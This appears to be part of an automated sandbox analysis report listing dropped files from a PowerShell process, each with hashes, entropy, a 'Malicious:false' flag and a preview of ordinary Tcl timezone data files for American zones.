                                                                                                                                                                                                                              SHA-512:E9F6CEB824D656CA25A72BF8EB4347A22E1A8E40410F01E0C2EDE19ACAF32D76540399796B3EBC7781C8B5D48C1A6B2C856CA06158AE37D95C95CF0567DFA2E5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Tijuana)]} {.. LoadTimeZoneFile America/Tijuana..}..set TZData(:America/Santa_Isabel) $TZData(:America/Tijuana)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1079
                                                                                                                                                                                                                              Entropy (8bit):3.8200568741699223
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5zeUdunSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQ/h:52SeSFESoSQSrSsCSeSPS1cSQSQlSsSU
                                                                                                                                                                                                                              MD5:7F2658032008F2C1308F121C2EBF2479
                                                                                                                                                                                                                              SHA1:B6F24E818B4424C0DEF818C103D1DA5359958932
                                                                                                                                                                                                                              SHA-256:4A397BD937DE1D7E6A941D18001B34D4CD195AEFD08951C30C7EE8E48656AA0E
                                                                                                                                                                                                                              SHA-512:F78853AA75F58A85555DD79E08A7487E5161854650DBF480189790D855738FEDCBDA936870067DE40FE000861008A9E9AAF61DF02B6B30B96038C61B5E1F1C1D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santarem) {.. {-9223372036854775808 -13128 0 LMT}.. {-1767212472 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8871
                                                                                                                                                                                                                              Entropy (8bit):3.5351636359890537
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:2Xv/lxUQjzoMUBI0nuUoDK6lPlgiot7JC/k8NWse4r4g5xCEmMQUs8nCxvisEbzu:2fD9TzDC9g32+E
                                                                                                                                                                                                                              MD5:81FC6AFF68B1CF2EA57ED13A42B35BE1
                                                                                                                                                                                                                              SHA1:5889E502FBDCBCDFE9E7053625FFFBAD61FFE256
                                                                                                                                                                                                                              SHA-256:77CED11337F43241D57C10BA752C7104A7AF8727992E7B90A3C5D62AA15E81C7
                                                                                                                                                                                                                              SHA-512:7756CBAF76966F3D45883B725B791A8DD60E8329F6FE19C12029C6FEBC90D7322765A0A8BA26FC586443A902B372D0C0189426A8F99B2B535BB8F1EE74796B44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santiago) {.. {-9223372036854775808 -16965 0 LMT}.. {-2524504635 -16965 0 SMT}.. {-1892661435 -18000 0 -05}.. {-1688410800 -16965 0 SMT}.. {-1619205435 -14400 0 -04}.. {-1593806400 -16965 0 SMT}.. {-1335986235 -18000 0 -05}.. {-1335985200 -14400 1 -05}.. {-1317585600 -18000 0 -05}.. {-1304362800 -14400 1 -05}.. {-1286049600 -18000 0 -05}.. {-1272826800 -14400 1 -05}.. {-1254513600 -18000 0 -05}.. {-1241290800 -14400 1 -05}.. {-1222977600 -18000 0 -05}.. {-1209754800 -14400 1 -05}.. {-1191355200 -18000 0 -05}.. {-1178132400 -14400 0 -04}.. {-870552000 -18000 0 -05}.. {-865278000 -14400 0 -04}.. {-740520000 -10800 1 -03}.. {-736635600 -14400 1 -04}.. {-718056000 -18000 0 -05}.. {-713649600 -14400 0 -04}.. {-36619200 -10800 1 -04}.. {-23922000 -14400 0 -04}.. {-3355200 -10800 1 -04}.. {7527600 -14400 0 -04}.. {24465600 -10800 1 -04}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):616
                                                                                                                                                                                                                              Entropy (8bit):4.330655351784895
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290/StmdHhvCvuCY/h/uFkS/5MVvMrW//MVvMrpx/m0XVvMr4UB/47VvMr/d:5+seQvuCY5/u/REfk+xxdbUBQpu652GO
                                                                                                                                                                                                                              MD5:FAD0621010889164ADC4472003C9391F
                                                                                                                                                                                                                              SHA1:C4EE0B8D6925338D17D5745DE9D45FA3C628DFC5
                                                                                                                                                                                                                              SHA-256:2217E72B11A90F2D679C175DE3CC0F2FED4C280C9FF9707CFFAF118BF9A06A4B
                                                                                                                                                                                                                              SHA-512:90E8E5A109CD72458C7796CF0324F63E543CCD63D13A09A3DD28EDC8B2793C964C18E79FDF0C5067C5A481B7FB03E8413139C32F59DA07E9D7893378ABBBD2B3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Santo_Domingo) {.. {-9223372036854775808 -16776 0 LMT}.. {-2524504824 -16800 0 SDMT}.. {-1159773600 -18000 0 EST}.. {-100119600 -14400 1 EDT}.. {-89668800 -18000 0 EST}.. {-5770800 -16200 1 -0430}.. {4422600 -18000 0 EST}.. {25678800 -16200 1 -0430}.. {33193800 -18000 0 EST}.. {57733200 -16200 1 -0430}.. {64816200 -18000 0 EST}.. {89182800 -16200 1 -0430}.. {96438600 -18000 0 EST}.. {120632400 -16200 1 -0430}.. {127974600 -18000 0 EST}.. {152082000 -14400 0 AST}.. {975823200 -14400 0 AST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2900
                                                                                                                                                                                                                              Entropy (8bit):3.6548008349990755
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:5uFChlvEwR9xSSx5H4a8tf3fku+da2XUd23t8VZDG8+w/ghBPWTRz908a9zRgwun:cFIlvEwZSSxdF8tfMu+da2kdCt8VZy8n
                                                                                                                                                                                                                              MD5:F6B732A862659EB131C2E6FEC00E9734
                                                                                                                                                                                                                              SHA1:49517DF63BC5B6FEC875CE9477BBF84F4072FA31
                                                                                                                                                                                                                              SHA-256:0E7BA1C5A3FA3DABDAA226BFE1E8D797A3835EA554828881AB5E365EDA09B92E
                                                                                                                                                                                                                              SHA-512:670A5B604B5EA0F5FA15083BC1EA115B7EFD449F9EAC4518E109493591893DD3627AFC6628E0EDD1953E932E2A7AD9B5A379526548677158EC445366E4ED7166
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sao_Paulo) {.. {-9223372036854775808 -11188 0 LMT}.. {-1767214412 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-195429600 -7200 1 -02}.. {-189381600 -7200 0 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6839
                                                                                                                                                                                                                              Entropy (8bit):3.565857684485945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9OgtbdF7TI7nYUYXg9W/OAcv7vuShytWi0PnvLrqPoKR2XszXckXtogYN4Ezlk0X:PJr9Q7TMq+ML
                                                                                                                                                                                                                              MD5:D1BF579FE8123E8EE9248A51E794CC78
                                                                                                                                                                                                                              SHA1:BF9CB9BED143C7529719E0C1E2F88BE1AC9F8DD4
                                                                                                                                                                                                                              SHA-256:158BD9E4EB0B9DFF3F2D3E2DBA72F217B73423012DD33A688FD57852124E884A
                                                                                                                                                                                                                              SHA-512:78192AC38912021F848592D0B208CB122EFFC6DDB326540FFAADA4FD3322B7A442FD1116F408D64B8788520B46545DFAE571EA42046D62A282A97ECCD5663655
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Scoresbysund) {.. {-9223372036854775808 -5272 0 LMT}.. {-1686090728 -7200 0 -02}.. {323841600 -3600 0 -01}.. {338961600 -7200 0 -02}.. {354679200 0 0 +00}.. {370400400 -3600 0 -01}.. {386125200 0 1 +00}.. {401850000 -3600 0 -01}.. {417574800 0 1 +00}.. {433299600 -3600 0 -01}.. {449024400 0 1 +00}.. {465354000 -3600 0 -01}.. {481078800 0 1 +00}.. {496803600 -3600 0 -01}.. {512528400 0 1 +00}.. {528253200 -3600 0 -01}.. {543978000 0 1 +00}.. {559702800 -3600 0 -01}.. {575427600 0 1 +00}.. {591152400 -3600 0 -01}.. {606877200 0 1 +00}.. {622602000 -3600 0 -01}.. {638326800 0 1 +00}.. {654656400 -3600 0 -01}.. {670381200 0 1 +00}.. {686106000 -3600 0 -01}.. {701830800 0 1 +00}.. {717555600 -3600 0 -01}.. {733280400 0 1 +00}.. {749005200 -3600 0 -01}.. {764730000 0 1 +00}.. {780454800 -3600 0 -01}.. {796179600 0 1 +00}.. {8
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):187
                                                                                                                                                                                                                              Entropy (8bit):4.888573146674231
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx06RGFfXHAIg206RORL/2IAcGEtOFBx+IAcGE6RB:SlSWB9vsM3y7+SPHAIgp+ON/290tO09Z
                                                                                                                                                                                                                              MD5:2FF74846ADF32AA3A9418376775B7F25
                                                                                                                                                                                                                              SHA1:130D7548DFFEBCE74969962E335B40299D7C5C54
                                                                                                                                                                                                                              SHA-256:BF4FAB3AE72CC7FA4F9E34CF0551A85C54A084CD826DF5D9CC684DE6188E84DB
                                                                                                                                                                                                                              SHA-512:9E52C017E595EEF1C68C8A1943416A9109D7DB4C32D25F83D05213C4200869A50E2E726894E39ECA364C558BB7F5566F6150CEA5D3CB14D1DEAE28C3D8C810E0
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Denver)]} {.. LoadTimeZoneFile America/Denver..}..set TZData(:America/Shiprock) $TZData(:America/Denver)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8651
                                                                                                                                                                                                                              Entropy (8bit):3.959337076866423
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:IGCG0hPC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:I5G0A9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:7CCB6902749079A0496F1E2E2137448E
                                                                                                                                                                                                                              SHA1:3D0ED7BF1C26659F6794E26AE3869F8AB925B6DF
                                                                                                                                                                                                                              SHA-256:ABB08435CAE80119068A85984BFFE9C1596F4FB90F07CC01124C907E5162C189
                                                                                                                                                                                                                              SHA-512:0B5B2DCECC70F357DB6D590AB63E600C572EA6B3F430565EFEB29777B1901AAC55CACC7495C668F739201076B180402141BC1B2ED2357E9B4DFBABF3B122AB44
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Sitka) {.. {-9223372036854775808 53927 0 LMT}.. {-3225223727 -32473 0 LMT}.. {-2188954727 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {3099492
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):207
                                                                                                                                                                                                                              Entropy (8bit):4.932842207797733
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290txP90ppv:MByMYbpwt2907P90b
                                                                                                                                                                                                                              MD5:CBFA61DBF6F7459CF8D517402B29998E
                                                                                                                                                                                                                              SHA1:A562B29C9470DBD25480966B0462433124BA4164
                                                                                                                                                                                                                              SHA-256:353CDBD46BA8C7472A93E9E800A69105801F6784B22EC50A59294CDC3BE40E18
                                                                                                                                                                                                                              SHA-512:00B333EAA2C32EDDA8F06457AD0E10013A0147B20F504F4F1096656F731A7C1896D5ABD83E7EDBD5D4E7DA587EE9BFA796539EB1E9F4056D75D1FDF203251150
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Barthelemy) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11289
                                                                                                                                                                                                                              Entropy (8bit):3.8713946894934614
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:PmxVjd1cO8f7/EjUhSicN6zvfwb+8YbTE0M0J:PmrcOI7/EjiskY01J
                                                                                                                                                                                                                              MD5:8F068899DA75663128320633E1881333
                                                                                                                                                                                                                              SHA1:E9161B45D7B11A2DD6E9679AC080E84EC51561E3
                                                                                                                                                                                                                              SHA-256:E2917204B0C843C32051BB371CF6D0AD272C02720B9C0D913AC072C8ABE1EC64
                                                                                                                                                                                                                              SHA-512:2200E9B9D816157330ADAEA7383635876E5A37329B1AF9613D38BCFBE8143835837A25132A94E44A61DB8058ED98B1A33F295EA64BC1F4CE30966D52BB0B673D
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/St_Johns) {.. {-9223372036854775808 -12652 0 LMT}.. {-2713897748 -12652 0 NST}.. {-1664130548 -9052 1 NDT}.. {-1650137348 -12652 0 NST}.. {-1640982548 -12652 0 NST}.. {-1632076148 -9052 1 NDT}.. {-1615145348 -12652 0 NST}.. {-1609446548 -12652 0 NST}.. {-1598650148 -9052 1 NDT}.. {-1590100148 -12652 0 NST}.. {-1567286948 -9052 1 NDT}.. {-1551565748 -12652 0 NST}.. {-1535837348 -9052 1 NDT}.. {-1520116148 -12652 0 NST}.. {-1503782948 -9052 1 NDT}.. {-1488666548 -12652 0 NST}.. {-1472333348 -9052 1 NDT}.. {-1457216948 -12652 0 NST}.. {-1440883748 -9052 1 NDT}.. {-1425767348 -12652 0 NST}.. {-1409434148 -9052 1 NDT}.. {-1394317748 -12652 0 NST}.. {-1377984548 -9052 1 NDT}.. {-1362263348 -12652 0 NST}.. {-1346534948 -9052 1 NDT}.. {-1330813748 -12652 0 NST}.. {-1314480548 -9052 1 NDT}.. {-1299364148 -12652 0 NST}.. {-1283030948 -9052 1 ND
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.907031043022691
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tMp490ppv:MByMYbpwt290g490b
                                                                                                                                                                                                                              MD5:D521F2D9B28C5374FC3BD540C6B6F40D
                                                                                                                                                                                                                              SHA1:39A3D86CB71F742F33B02F50B316638815B3CD4E
                                                                                                                                                                                                                              SHA-256:EDB9457A7C64E47062BDC6458FD3BCFCD6C37820F1A2BC89DFE99ED77355011F
                                                                                                                                                                                                                              SHA-512:05C1BE92550A962904ED3BB7DECCAC16FCB54D258F24F2AEDF755FCC44E4FEF5F86AB663945809F5D7AFA64178E807BBDAE77048270ED516DFF2C7720A746D52
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Kitts) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):202
                                                                                                                                                                                                                              Entropy (8bit):4.9037013606484905
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tY90ppv:MByMYbpwt290a90b
                                                                                                                                                                                                                              MD5:9392E5A7BD198B0308F9271E4C7E59B2
                                                                                                                                                                                                                              SHA1:A902440920A0318BC930957C74804A9A51EF7818
                                                                                                                                                                                                                              SHA-256:6727A509BB937CB3446D41B57826DE70C7028E96F088AB5B7F803BEAA18279E8
                                                                                                                                                                                                                              SHA-512:6DA1EAC390E72905DF1A14D82362B499D20FAD6D85F3DF116AE01E566D5D19C6D16E56DA72C458BB6143345EF45F35A53B245488C641D80BFBA200B16A59719E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Lucia) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):203
                                                                                                                                                                                                                              Entropy (8bit):4.919272465019375
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tXIMFJ490ppv:MByMYbpwt290tJ490b
                                                                                                                                                                                                                              MD5:49D0C8DAFCA053C9967EDCC4C0A484B1
                                                                                                                                                                                                                              SHA1:7B4999D4B9AD93306BD411DF2946D741EC597770
                                                                                                                                                                                                                              SHA-256:974AEED3D79124B50265C83D84F23CBE4F0328D00C75F42DD3ABC5D4C0A78DE1
                                                                                                                                                                                                                              SHA-512:378E3657B26C5A039FF82ECCAC7797FF45CBC6479596629B3048164EE4E035F4ECFC557AA9EAF6848E78999B4FF8C63E53C7163BDF6F626ED6111004490D6F80
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Thomas) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.909053768717241
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290tzb+Q90ppv:MByMYbpwt290xyQ90b
                                                                                                                                                                                                                              MD5:6CFB23E7164605CDE380FB7C4D88DF11
                                                                                                                                                                                                                              SHA1:CC513B29AD7B59E600DBCBC97927EB632558F657
                                                                                                                                                                                                                              SHA-256:6B19404D295964EF66F47802836BB728FCE8E6481115797C0B5F200C354D7C8A
                                                                                                                                                                                                                              SHA-512:728987D0925B6E12E8A220920BEDF94180880E78F3F08F6AC740E6304B22D446846068CEA499F61E7032ADB2E700CE31954921D478C9A8B6CB599E05A6292EA3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/St_Vincent) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):874
                                                                                                                                                                                                                              Entropy (8bit):4.253846650171654
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:MB86290hEbmdHLCvYX4Q19xRv0+RmwPj+uLkQOzL3+ORL4FXgenM7RSslKA1PyKp:5zeOvT4xuyqoYaAxt7l
                                                                                                                                                                                                                              MD5:C91F801CC5E9F78B966D1DF2259C38A8
                                                                                                                                                                                                                              SHA1:D29C970CBFC74684D46AAAD543B73B520775632C
                                                                                                                                                                                                                              SHA-256:939B25C9412B9E25D73F552E87826999FC8C929770E66491D1E4530046D3E758
                                                                                                                                                                                                                              SHA-512:093378E61DE9310F9C48170CBB0FDBD3C79E184DA1489F759B20BCE410006A9D5A793C82E79A46E0AFF0DAA47D9DBAFD605959E491BA9ED4E55D26F293642D32
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Swift_Current) {.. {-9223372036854775808 -25880 0 LMT}.. {-2030201320 -25200 0 MST}.. {-1632063600 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-747241200 -21600 0 MDT}.. {-732729600 -25200 0 MST}.. {-715791600 -21600 1 MDT}.. {-702489600 -25200 0 MST}.. {-684342000 -21600 1 MDT}.. {-671040000 -25200 0 MST}.. {-652892400 -21600 1 MDT}.. {-639590400 -25200 0 MST}.. {-631126800 -25200 0 MST}.. {-400086000 -21600 1 MDT}.. {-384364800 -25200 0 MST}.. {-337186800 -21600 1 MDT}.. {-321465600 -25200 0 MST}.. {-305737200 -21600 1 MDT}.. {-292435200 -25200 0 MST}.. {-273682800 -21600 1 MDT}.. {-260985600 -25200 0 MST}.. {73472400 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):341
                                                                                                                                                                                                                              Entropy (8bit):4.638828647226646
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9eg/2903fDm2OHskeoHxbV1ULhgdrV/uF+IcmJ3/uF+ivi9/uF+SNv:MB862903LmdHsVCn1ULSB/uF+QV/uF+q
                                                                                                                                                                                                                              MD5:4C4034ABAB9E4804CCB23E51694044C9
                                                                                                                                                                                                                              SHA1:7DB24CE83AB2C07E6F6784D27C4E3AC0F149D080
                                                                                                                                                                                                                              SHA-256:1F0503579B0DDDBAF88814A278127D9CD7019EDD3C35F4CBFC0EF11C0EDAFE5B
                                                                                                                                                                                                                              SHA-512:0BC366CD3AB2E1388D11770DC8DEC1FC94C48FDC846ABB6C487828BF9FF15CD9A1C15B33E08F6E48B7F4A6F2AD1617FF12B359784CA4C32256D72422E6825105
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Tegucigalpa) {.. {-9223372036854775808 -20932 0 LMT}.. {-1538503868 -21600 0 CST}.. {547020000 -18000 1 CDT}.. {559717200 -21600 0 CST}.. {578469600 -18000 1 CDT}.. {591166800 -21600 0 CST}.. {1146981600 -18000 1 CDT}.. {1154926800 -21600 0 CST}..}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6890
                                                                                                                                                                                                                              Entropy (8bit):3.8331465442823704
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:mJInJuFW4ng2CEBJuQaeEy9P19OBYEi/B51B7/Bm6BTd69xK7KjhVbHyR3h1gOZM:miFCC
                                                                                                                                                                                                                              MD5:D93B62D5F7EEBC28AC047BED2307CAE8
                                                                                                                                                                                                                              SHA1:8B3E02240A01B5AA42D30E86005E880916432227
                                                                                                                                                                                                                              SHA-256:7FB0CBB101D3B6FBB6B9DAD5446BBF9E6AEC65EC38472739E604F68F6AA9AB7B
                                                                                                                                                                                                                              SHA-512:3648106F4DF84CFD94AAD4E9430F8D3BBCB38A9196DE9A59246DFBBC170FADBF106DD1FD08FE2E4F7319BFFB1C2607E4F5D563C222CED8267483D1A0C388CCE5
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Thule) {.. {-9223372036854775808 -16508 0 LMT}.. {-1686079492 -14400 0 AST}.. {670399200 -10800 1 ADT}.. {686120400 -14400 0 AST}.. {701848800 -10800 1 ADT}.. {717570000 -14400 0 AST}.. {733903200 -10800 1 ADT}.. {752043600 -14400 0 AST}.. {765352800 -10800 1 ADT}.. {783493200 -14400 0 AST}.. {796802400 -10800 1 ADT}.. {814942800 -14400 0 AST}.. {828856800 -10800 1 ADT}.. {846392400 -14400 0 AST}.. {860306400 -10800 1 ADT}.. {877842000 -14400 0 AST}.. {891756000 -10800 1 ADT}.. {909291600 -14400 0 AST}.. {923205600 -10800 1 ADT}.. {941346000 -14400 0 AST}.. {954655200 -10800 1 ADT}.. {972795600 -14400 0 AST}.. {986104800 -10800 1 ADT}.. {1004245200 -14400 0 AST}.. {1018159200 -10800 1 ADT}.. {1035694800 -14400 0 AST}.. {1049608800 -10800 1 ADT}.. {1067144400 -14400 0 AST}.. {1081058400 -10800 1 ADT}.. {1099198800 -14400 0 AST}..
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
